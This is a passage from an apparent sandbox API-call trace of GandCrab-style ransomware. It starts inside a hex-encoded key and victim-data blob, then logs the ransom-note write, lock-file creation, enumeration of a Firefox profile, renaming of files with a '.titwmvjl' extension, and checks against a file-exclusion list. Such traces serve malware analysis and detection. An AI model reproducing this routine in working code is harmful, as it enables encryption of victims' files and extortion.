x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0080.844] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0080.845] CloseHandle (hObject=0x2dc) returned 1 [0080.845] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.845] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.845] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1a, wMilliseconds=0x9b)) [0080.845] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.845] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0080.845] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0080.846] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock") returned 119 [0080.846] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0080.846] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.846] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.847] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\") returned 95 [0080.847] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*" [0080.847] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503938 [0080.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.847] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0080.847] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.847] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0080.847] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0080.847] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0080.848] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock" [0080.848] lstrlenW (lpString=".titwmvjl") returned 9 [0080.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock") returned 119 [0080.848] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.848] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 128 [0080.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a09d2ca4deb61a.lock") returned 119 [0080.848] lstrlenW (lpString=".lock") returned 5 [0080.848] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.848] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0080.848] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.848] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.848] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0080.848] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0080.848] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0080.849] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt" [0080.849] lstrlenW (lpString=".titwmvjl") returned 9 [0080.849] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt") returned 115 [0080.849] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.849] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 124 [0080.849] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt") returned 115 [0080.849] lstrlenW (lpString=".txt") returned 4 [0080.849] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.849] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0080.849] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0080.849] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.850] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt") returned 115 [0080.850] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\TITWMVJL-DECRYPT.txt") returned 115 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0080.850] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0080.850] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.850] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0080.850] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0080.850] CloseHandle (hObject=0x2dc) returned 1 [0080.850] FindNextFileW (in: hFindFile=0x503978, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0080.851] lstrcmpW (lpString1="store.json.mozlz4", lpString2=".") returned 1 [0080.851] lstrcmpW (lpString1="store.json.mozlz4", lpString2="..") returned 1 [0080.851] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="store.json.mozlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" [0080.851] lstrlenW (lpString=".titwmvjl") returned 9 [0080.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0080.851] VirtualAlloc (lpAddress=0x0, dwSize=0x112, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.851] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.titwmvjl") returned 114 [0080.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0080.851] lstrlenW (lpString=".mozlz4") returned 7 [0080.851] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.851] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".mozlz4 ") returned 8 [0080.851] lstrcmpiW (lpString1=".mozlz4", lpString2=".titwmvjl") returned -1 [0080.851] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0080.851] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0080.851] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="desktop.ini") returned 1 [0080.851] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="autorun.inf") returned 1 [0080.851] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntuser.dat") returned 1 [0080.851] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="iconcache.db") returned 1 [0080.851] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="bootsect.bak") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="boot.ini") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntuser.dat.log") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="thumbs.db") returned -1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="KRAB-DECRYPT.html") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="CRAB-DECRYPT.html") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="KRAB-DECRYPT.txt") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="CRAB-DECRYPT.txt") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntldr") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="NTDETECT.COM") returned 1 [0080.852] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="Bootfont.bin") returned 1 [0080.852] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0080.852] lstrlenW (lpString=".mozlz4") returned 7 [0080.852] VirtualAlloc (lpAddress=0x0, dwSize=0x12, 